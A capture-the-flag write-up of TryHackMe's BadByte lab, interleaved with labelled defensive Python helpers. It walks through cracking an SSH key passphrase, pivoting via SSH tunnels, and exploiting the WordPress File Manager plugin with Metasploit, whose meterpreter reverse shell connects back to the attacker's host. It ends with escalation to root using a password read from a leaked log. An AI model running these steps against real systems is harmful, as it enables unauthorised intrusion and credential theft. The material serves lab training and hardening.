BadByte — TryHackMe

BadByte-THM

This is a write-up for TryHackMe's room named BadByte. It is a beginner-friendly room: we need to infiltrate BadByte and then take over root. Let's start the enumeration process using nmap.

Reconnaissance

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.114.112

$ sudo nmap -sS -Pn -T4 -p- 10.10.114.112                                                                                                 
PORT STATE SERVICE
22/tcp open ssh
30024/tcp open unknown

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,30024 10.10.114.112

$ sudo nmap -O -A -Pn -T4 -p22,30024 10.10.114.112
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:89:a3:33:67:85:ac:08:a5:0f:1a:d4:79:78:d2:66 (RSA)
| 256 c1:93:e9:26:b8:9b:85:bc:c2:8e:08:a2:a4:85:f6:85 (ECDSA)
|_ 256 dd:e1:5c:32:d1:fc:a3:c5:4a:0e:bf:c8:c2:79:e4:71 (ED25519)
30024/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 1752 Dec 27 19:55 id_rsa
|_-rw-r--r-- 1 ftp ftp 78 Dec 28 16:50 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.98.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status

All the questions in this section can be answered from the above scans.

Foothold

From the Reconnaissance section we saw that FTP is running with anonymous login allowed and that two files are accessible. FTP to the target and download both files locally:

ftp 10.10.114.112 30024
Connected to 10.10.114.112.
220 (vsFTPd 3.0.3)
Name (10.10.114.112:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> prompt off
Interactive mode off.
ftp> mget *
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1752 bytes).
226 Transfer complete.
1752 bytes received in 0.00 secs (1.2952 MB/s)
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (78 bytes).
226 Transfer complete.
78 bytes received in 0.00 secs (64.4978 kB/s)
ftp> quit
221 Goodbye.

id_rsa is a private SSH key, but it is encrypted with a passphrase. We can crack the passphrase using ssh2john.py, which comes by default with Kali:

$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (id_rsa)
1g 0:00:00:07 DONE (2021-03-13 19:16) 0.1369g/s 1964Kp/s 1964Kc/s 1964KC/s ..*7¡Vamos!
Session completed

$ john --show id_rsa.hash
id_rsa:[REDACTED]
1 password hash cracked, 0 left

note.txt gives us a username. The username and the cracked SSH key passphrase give us the answers for this section.
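The john output above reports an MD5-based KDF for the key, which is what makes the passphrase cheap to brute-force. The following is an added example (not code from the write-up or from the room) that inspects an OpenSSH private key file and reports which format and KDF protect it: the legacy PEM format ("BEGIN RSA PRIVATE KEY" with "Proc-Type: 4,ENCRYPTED") derives the cipher key from the passphrase with a single MD5 pass, while the openssh-key-v1 format uses bcrypt with a configurable round count. The sample keys are constructed and carry only header fields, no key material; the threshold of 16 bcrypt rounds is an assumption taken from ssh-keygen's default for -a.

```python
import base64
import re
import struct

# Added example, not part of the original write-up. Floor for "strong enough"
# bcrypt rounds; 16 is ssh-keygen's default for the -a option (assumption).
DEFAULT_BCRYPT_ROUNDS = 16


def _read_string(buf: bytes, off: int):
    """Read an SSH wire-format string: uint32 big-endian length, then bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def inspect_private_key(pem: str) -> dict:
    """Report format, cipher, KDF and round count of an OpenSSH private key."""
    lines = [ln.strip() for ln in pem.strip().splitlines() if ln.strip()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))  # drop BEGIN/END lines
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(magic)
        cipher, off = _read_string(blob, off)   # e.g. aes256-ctr, or "none"
        kdf, off = _read_string(blob, off)      # "bcrypt" or "none"
        kdfopts, off = _read_string(blob, off)  # bcrypt: string salt + uint32 rounds
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        encrypted = cipher != b"none"
        return {
            "format": "openssh-key-v1",
            "encrypted": encrypted,
            "cipher": cipher.decode(),
            "kdf": kdf.decode(),
            "rounds": rounds,
            # No passphrase at all, or too few bcrypt rounds, both count as weak.
            "weak": (not encrypted) or (rounds is not None and rounds < DEFAULT_BCRYPT_ROUNDS),
        }
    if re.fullmatch(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", header):
        encrypted = any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines)
        dek = next((ln.split(":", 1)[1].strip() for ln in lines if ln.startswith("DEK-Info:")), None)
        return {
            "format": "pem",
            "encrypted": encrypted,
            "cipher": dek.split(",")[0] if dek else None,
            "kdf": "md5" if encrypted else None,
            "rounds": 1 if encrypted else None,
            # Legacy PEM is weak either way: no passphrase, or a single-pass MD5 KDF.
            "weak": True,
        }
    raise ValueError("unrecognised key header: " + header)


# Constructed legacy-format sample: real header lines, filler instead of a key body.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----"""


def build_v1_sample(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Construct a truncated openssh-key-v1 file holding only the cipher/KDF
    header fields (no key material) so the parser can be exercised offline."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


if __name__ == "__main__":
    samples = [
        ("legacy pem", LEGACY_PEM),
        ("v1 bcrypt/16", build_v1_sample(b"aes256-ctr", b"bcrypt", 16)),
        ("v1 bcrypt/4", build_v1_sample(b"aes256-ctr", b"bcrypt", 4)),
        ("v1 no passphrase", build_v1_sample(b"none", b"none", 0)),
    ]
    for label, key in samples:
        print(f"{label:18} {inspect_private_key(key)}")
```

Run it against a real key with `inspect_private_key(open("id_rsa").read())`; a key that comes back as `format: pem` can be rewritten into the current format with a stronger KDF using `ssh-keygen -p -o -a 16 -f id_rsa`.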

Port Forwarding

Set up dynamic port forwarding using SSH as a SOCKS proxy. Add the following entry to /etc/proxychains.conf on the local Kali machine:

socks5 127.0.0.1 1337

Remember to comment out the default line in the same file:

socks4 127.0.0.1 9050

Now use SSH with the private key, the username and the passphrase we cracked in the last section:

$ ssh -i id_rsa -N -D 1337 [REDACTED]@10.10.114.112
Enter passphrase for key 'id_rsa':

Now run nmap through proxychains; the scan travels through the SOCKS tunnel, so it effectively scans the target's own loopback interface. Use -sT (TCP connect scan), because proxychains can only relay TCP connections and a SYN scan would bypass the proxy:

$ proxychains nmap -sT 127.0.0.1                                                                                                         
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 19:28 EST
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:80-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:995-<--timeout
---
---
---
Nmap scan report for localhost (127.0.0.1)
Host is up (0.020s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql

This nmap scan result should answer the question asked in this section.

Now that we know port 80 is open internally on the target, we can use local port forwarding to reach that port from our local Kali machine:

ssh -i id_rsa -L 8080:127.0.0.1:80 [REDACTED]@10.10.218.159

Use the same username we found earlier. Access the web page locally at:

http://127.0.0.1:8080/
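The pivot in this section works because the compromised account is allowed to open SSH tunnels (-D and -L). On the server side that is governed by the AllowTcpForwarding keyword in sshd_config, which can be restricted per account with a Match block. The following is an added example (not code from the write-up or the room) that resolves the effective value of a sshd_config keyword for a given user: sshd takes the first value obtained for a keyword, and the first matching Match block overrides the global section. Both configs and the account names webdeploy and admin are constructed samples; only the "Match User" and "Match all" criteria are handled, and keywords are expected in "Keyword value" form.

```python
import fnmatch

# Added example, not the write-up's own code. Constructed sshd_config samples:
# the weak one leaves forwarding at sshd's default (allowed for everyone), the
# hardened one denies it for a hypothetical low-privilege account only.
WEAK_SSHD_CONFIG = """\
# global section: forwarding allowed for everyone, which is also sshd's default
PermitRootLogin no
AllowTcpForwarding yes
"""

HARDENED_SSHD_CONFIG = """\
PermitRootLogin no
AllowTcpForwarding yes

# hypothetical low-privilege account: deny -L/-R/-D tunnels and tun devices
Match User webdeploy
    AllowTcpForwarding no
    PermitTunnel no

Match User admin
    AllowTcpForwarding yes
"""


def _match_users(criteria: list) -> list:
    """Collect the user patterns from the tokens after 'Match'. Only the User
    criterion is handled; a block with other criteria matches nobody here."""
    users = []
    for i in range(0, len(criteria) - 1, 2):
        if criteria[i].lower() == "user":
            users.extend(criteria[i + 1].split(","))
    return users


def effective_setting(config: str, keyword: str, user: str, default: str) -> str:
    """Value sshd would apply for `keyword` to a connection by `user`."""
    keyword = keyword.lower()
    global_value = None
    match_value = None
    block_users = None  # None while still in the global section
    for raw in config.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and whitespace
        if not line:
            continue
        tokens = line.split()
        key = tokens[0].lower()
        if key == "match":
            block_users = ["*"] if tokens[1:2] and tokens[1].lower() == "all" else _match_users(tokens[1:])
            continue
        if key != keyword or len(tokens) < 2:
            continue
        value = tokens[1]
        if block_users is None:
            if global_value is None:      # first global value wins
                global_value = value
        elif match_value is None and any(fnmatch.fnmatchcase(user, p) for p in block_users):
            match_value = value           # first matching Match block wins
    return match_value or global_value or default


def forwarding_allowed(config: str, user: str) -> bool:
    """True if the account could open -L/-R/-D tunnels; sshd's default is yes."""
    return effective_setting(config, "AllowTcpForwarding", user, "yes").lower() != "no"


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        for account in ("webdeploy", "admin"):
            print(f"{label:9} {account:10} forwarding allowed: {forwarding_allowed(cfg, account)}")
```

As sshd_config(5) itself notes, disabling TCP forwarding is only a real control when the account also has no interactive shell, since a user with a shell can run their own forwarder; for a service account that only needs SFTP or a forced command, pair the Match block with ForceCommand or a restricted shell.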

Web Exploitation

It is pretty clear from the web page which CMS is running on the target. Let's use nmap again: its NSE scripts can also enumerate a WordPress install for outdated components. Use 127.0.0.1 and port 8080 as the target:

$ nmap --script http-wordpress-enum --script-args check-latest=true,search-limit=1500 -p 8080 127.0.0.1        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:23 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00010s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
| http-wordpress-enum:
| Search limited to top 1500 themes/plugins
| themes
| twentyseventeen 1.5
| plugins
| akismet
| duplicator 1.3.26 (latest version:1.4.0)
|_ wp-file-manager 6.0 (latest version:7.1)
Nmap done: 1 IP address (1 host up) scanned in 69.75 seconds
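The scan above is just as useful from the defending side: the same http-wordpress-enum output tells an administrator which plugins lag behind their latest release. The following is an added example (not code from the write-up or the room) that parses the themes/plugins entries in that output format and flags components whose installed version is lower than the reported latest version, turning the scan into a patch list. SAMPLE_SCAN is constructed to mirror the format shown above.

```python
import re

# Added example, not part of the original write-up. Constructed sample in the
# format nmap's http-wordpress-enum script prints.
SAMPLE_SCAN = """\
| http-wordpress-enum:
| Search limited to top 1500 themes/plugins
|   themes
|     twentyseventeen 1.5
|   plugins
|     akismet
|     duplicator 1.3.26 (latest version:1.4.0)
|_    wp-file-manager 6.0 (latest version:7.1)
"""

# entry: name, optional installed version, optional "(latest version:X)" suffix
ENTRY_RE = re.compile(
    r"^(?P<name>[\w-]+)"
    r"(?:\s+(?P<installed>\d+(?:\.\d+)*))?"
    r"(?:\s+\(latest version:(?P<latest>\d+(?:\.\d+)*)\))?$"
)


def parse_version(text: str) -> tuple:
    """Turn '1.3.26' into (1, 3, 26) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def parse_wordpress_enum(output: str) -> list:
    """One dict per theme/plugin entry: kind, name, versions and a status."""
    entries = []
    kind = None
    for line in output.splitlines():
        body = line.lstrip("|_ ").rstrip()   # drop the NSE tree prefix
        if body in ("themes", "plugins"):
            kind = body
            continue
        if kind is None:
            continue                         # header lines before the first section
        m = ENTRY_RE.match(body)
        if not m:
            continue
        installed, latest = m.group("installed"), m.group("latest")
        if installed and latest:
            status = "outdated" if parse_version(installed) < parse_version(latest) else "current"
        else:
            # The script does not always print a latest version; report that as
            # unknown rather than assuming the component is current.
            status = "unknown"
        entries.append({"kind": kind, "name": m.group("name"),
                        "installed": installed, "latest": latest, "status": status})
    return entries


def outdated_components(output: str) -> list:
    """Only the entries that need updating, for the patch list."""
    return [e for e in parse_wordpress_enum(output) if e["status"] == "outdated"]


if __name__ == "__main__":
    for e in parse_wordpress_enum(SAMPLE_SCAN):
        print(f"{e['kind']:8} {e['name']:18} {e['installed'] or '?':8} -> {e['latest'] or '?':8} {e['status']}")
```

Feed it the saved output of your own scan (`nmap ... -oN scan.txt`, then `parse_wordpress_enum(open("scan.txt").read())`); entries reported as "unknown" still need a manual version check against the plugin's changelog.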

Now searching the web for these plugins gives the CVEs associated with them.

Searching for one of those CVEs inside the MSF console gives us an RCE module, which can be exploited by setting the following options:

msf6 > search CVE-2020-REDACTED

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_file_manager_rce

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > show options
Module options (exploit/multi/http/wp_file_manager_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND upload yes elFinder commands used to exploit the vulnerability (Accepted: upload, mkfile+put)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to WordPress installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:

Id Name
-- ----
0 WordPress File Manager 6.0-6.8
msf6 exploit(multi/http/wp_file_manager_rce) > set LHOST tun0
LHOST => 10.8.98.192
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > exploit
[*] Started reverse TCP handler on 10.8.98.192:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/omCtHP.php
[*] Sending stage (39282 bytes) to 10.10.218.159
[*] Meterpreter session 1 opened (10.8.98.192:4444 -> 10.10.218.159:60366) at 2021-03-13 21:43:30 -0500
[+] Deleted omCtHP.php
meterpreter > pwd
/usr/share/wordpress/wp-content/plugins/wp-file-manager/lib/files
meterpreter > ps -ef
Process List
============
PID Name User Path
--- ---- ---- ----
1 /sbin/init root /sbin/init auto automatic-ubiquity noprompt
---
822 /usr/sbin/apache2 [REDACTED] /usr/sbin/apache2 -k start
meterpreter > cd /home/REDACTED
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2021-01-18 08:53:09 -0500 REDACTED
40755/rwxr-xr-x 4096 dir 2020-12-28 11:52:33 -0500 REDACTED
Listing: /home/REDACTED
==================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100664/rw-rw-r-- 38 fil 2020-12-28 11:53:01 -0500 user.txt
meterpreter > cat user.txt
THM{REDACTED}
meterpreter >

So from the above we got the user running the CMS (the owner of the apache2 process) and also the user's flag.

We can also enumerate users with WPScan:

$ wpscan --url http://127.0.0.1:8080/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.15
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 21:34:11 2021
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:

[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Privilege Escalation

From the meterpreter session we got in the last section, browse the file system; the file /var/log/bash.log looks suspicious:

meterpreter > cd /var/log
meterpreter > ls -lrt bash.log
100644/rw-r--r-- 1859 fil 2021-01-18 08:53:09 -0500 bash.log
meterpreter > cat bash.log
Script started on 2021-01-15 16:42:35+0000
[REDACTED]

This file gives us the user's password, and the new password can be easily guessed by following the pattern described in the room's current section. We can now use SSH to log in as this newly found user (the user running WordPress/Apache2) with the guessed password. Running sudo -l tells us that this user can run anything as root, so just run sudo su, which gives us root and the root flag at /root/root.txt.
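The "Script started on" header shows bash.log is a terminal recording made with the script(1) command and then left in /var/log, where the web server's account could read it. The following is an added example (not code from the write-up or the room) of the check an administrator would run over log files: it flags typescript recordings and password prompts whose typed answer was captured on the following line, reporting only line numbers and never the captured values. SAMPLE_TYPESCRIPT is a constructed stand-in for the redacted file (the token on its line 6 is a placeholder, not a real secret), and SAMPLE_SYSLOG is a constructed benign file for comparison.

```python
import re

# Added example, not part of the original write-up. Constructed stand-in for a
# script(1) recording; the line after the second prompt is a placeholder token.
SAMPLE_TYPESCRIPT = """\
Script started on 2021-01-15 16:42:35+0000
user@host:~$ passwd
Changing password for user.
(current) UNIX password:
Enter new UNIX password:
PLACEHOLDER-NOT-A-REAL-SECRET
Retype new UNIX password:
passwd: password updated successfully
Script done on 2021-01-15 16:45:10+0000
"""

# Constructed benign log lines, to show the checks stay quiet on ordinary logs.
SAMPLE_SYSLOG = """\
Jan 15 16:42:35 host sshd[1234]: Accepted publickey for user from 10.0.0.5 port 50000 ssh2
Jan 15 16:42:36 host systemd-logind[600]: New session 7 of user user.
"""

TYPESCRIPT_HEADER = re.compile(r"^Script (started|done) on ")
PROMPT_RE = re.compile(r"password[^:]*:\s*$", re.IGNORECASE)  # "... password:" prompts


def is_typescript(text: str) -> bool:
    """script(1) writes a 'Script started on ...' header as its first line."""
    first = text.splitlines()[0] if text else ""
    return bool(TYPESCRIPT_HEADER.match(first))


def _looks_like_typed_value(line: str) -> bool:
    # A captured passphrase is a single short token: no spaces, not another
    # prompt, and not a program's status message (which contains spaces).
    s = line.strip()
    return bool(s) and " " not in s and len(s) <= 64 and not PROMPT_RE.search(s)


def find_captured_prompt_answers(text: str) -> dict:
    """Map each password-prompt line number to the line number of a value that
    appears to have been echoed straight after it (1-based line numbers)."""
    lines = text.splitlines()
    findings = {}
    for idx, line in enumerate(lines):
        if not PROMPT_RE.search(line):
            continue
        nxt = lines[idx + 1] if idx + 1 < len(lines) else ""
        if _looks_like_typed_value(nxt):
            findings[idx + 1] = idx + 2
    return findings


def audit_log_text(name: str, text: str, world_readable: bool) -> dict:
    """Summarise one file; 'severity' is what a reviewer should look at first."""
    captured = find_captured_prompt_answers(text)
    typescript = is_typescript(text)
    if captured and world_readable:
        severity = "high"        # secret-looking line readable by any local account
    elif captured or typescript:
        severity = "medium"      # recording, or a leak only root can read
    else:
        severity = "none"
    return {"file": name, "typescript": typescript, "world_readable": world_readable,
            "captured_prompt_lines": captured, "severity": severity}


if __name__ == "__main__":
    for name, text in (("bash.log", SAMPLE_TYPESCRIPT), ("syslog", SAMPLE_SYSLOG)):
        print(audit_log_text(name, text, world_readable=True))
```

To run it over a real directory, pass each file's contents together with `bool(os.stat(path).st_mode & stat.S_IROTH)` as the world_readable flag; a "high" finding means the file should be removed or its permissions tightened and the exposed credential rotated, and the separate sudo -l result above (ALL as root) is the second control to review for the same account.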

That's it. Thanks for reading.

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

0xsanz